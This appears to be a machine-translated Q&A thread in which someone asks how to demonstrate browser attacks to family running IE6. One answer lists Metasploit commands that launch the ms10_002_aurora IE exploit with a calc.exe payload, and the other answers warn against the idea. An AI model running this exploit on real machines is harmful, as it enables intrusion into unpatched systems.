URL del sito Web per indirizzare gli utenti a "fare un punto" sulla sicurezza [chiuso]

3

È "conoscenza comune" che i browser e i sistemi operativi privi di patch e più vecchi sono pericolosi, ma quando dico alla gente che non dovrebbero fare il loro banking online in IE 6 su un service pack XP pirata 0, nessuno ascolta. Esiste un URL del sito Web che potrei indirizzare a persone che dimostreranno un "attacco" ma che in realtà non danneggiano? Sto cercando qualcosa per spaventarli in un browser migliore o un sistema operativo con licenza. Per le persone a cui non mi importa darei un link a http://their-name.nimp.org ma non voglio farlo alle persone con cui dovrò occuparmi più tardi! Questo è qualcosa che farei mentre sono a casa con loro (amici e famiglia) per educarli, non una pagina che collegherei ai miei siti web.

Nota che non sto cercando una pagina che spieghi i pericoli, ma piuttosto una pagina che mostri i pericoli.

Sto cercando qualcosa di innocuo, simile a questa pagina terrificante che dimostra il motivo per cui non dovremmo mai copiare i comandi del terminale nel suo terminale, anche se capisce il codice :

link

Il mio obiettivo è solo quello di mostrare che gli attacchi sono possibili e in realtà si verificano. Pensa a questo come lasciare che un bambino tocchi una partita accesa, per insegnargli a stare lontano dalla fiamma della gamma con l'olio bollente in padella! Sì, l'ho fatto con i miei figli e stanno lontano dalla portata!

    
posta dotancohen 02.06.2013 - 16:49
fonte

3 risposte

5

Se vuoi veramente spaventarli senza alcun impatto negativo, ospita internamente un exploit IE 6 di Metasploit in uno dei tuoi sistemi, imposta il payload su calc che farà apparire una calcolatrice quando i loro browser vengono sfruttati e quindi interromperà sessione. Dì loro se qualcuno può far apparire una calcolatrice sul proprio computer a loro insaputa, probabilmente possono anche fare un sacco di cose cattive.

Ecco i passaggi:

msf > use exploit/windows/browser/ms10_002_aurora
msf > set SRVHOST 0.0.0.0
msf > set SRVPORT 80
msf > set URIPATH /
msf > set payload windows/exec
msf > set CMD=calc.exe
msf > exploit
    
risposta data 02.06.2013 - 20:40
fonte
3

So che stai cercando un sito 'spaventato dritto' invece di un sito che educa l'utente, ma questa è una cattiva idea ... Per ragioni che @Terry Chia copre nella sua risposta.

Raccomando la via educativa con un possibile aspetto di sfida ...

Ci sono molti siti di controllo sicurezza affidabili. Sfida i tuoi amici / familiari che non saranno in grado di ottenere un voto 'passeggero' su uno di loro. Motivali a dimostrare che hai torto.

Questa sarebbe una gamification povera di sicurezza del browser.

link

    
risposta data 02.06.2013 - 17:21
fonte
2

Questa è una pessima idea molto . Non posso sottolineare quanto sia stupida questa idea.

Vuoi indirizzare i tuoi utenti verso un sito web reale che esegue un exploit su di loro? Anche se dici non fa male, chi diavolo ti crederà? Prima di tutto, stai cercando un sito Web di terze parti. Anche se oggi il sito non esegue nulla di malevolo, chi può dire che il carico utile "innocuo" non si trasformerà in qualcosa di un po 'più dannoso in futuro?

Vuoi anche associare il tuo sito web a qualcosa che sfrutta lo sfruttamento dei tuoi utenti? Che cosa accadrà alla reputazione del tuo sito web se viene inserita in una lista nera?

Infine, IANAL ma sono abbastanza sicuro che tu sia su basi legali traballanti qui ...

    
risposta data 02.06.2013 - 16:53
fonte

Leggi altre domande sui tag